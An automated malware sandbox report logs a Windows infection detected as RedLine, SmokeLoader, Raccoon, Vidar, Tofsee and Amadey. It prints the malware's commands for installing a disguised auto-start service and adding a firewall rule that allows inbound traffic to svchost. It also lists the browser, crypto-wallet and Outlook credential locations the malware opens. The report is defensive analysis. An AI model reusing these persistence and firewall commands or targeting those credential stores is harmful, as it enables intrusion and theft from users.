                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000007.00000000.699536382.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.682849926.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.671538738.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.689795661.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: explorer.exe, 00000007.00000000.676243228.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.692994806.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00408ECC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004017B8 SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Modifies the windows firewallShow sources
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Amadeys stealer DLLShow sources
                          Source: Yara matchFile source: 0000002C.00000002.861387374.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.862648627.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.851523322.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.922320666.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.861216810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.922065268.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR
                          Tries to steal Mail credentials (via file / registry access)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                          Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: ExodusE#
                          Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmpString found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                          Source: 8EC4.exeString found in binary or memory: set_UseMachineKeyStore
                          Tries to harvest and steal browser information (history, passwords, etc)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: Yara matchFile source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 8EC4.exe PID: 6240, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_003288B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

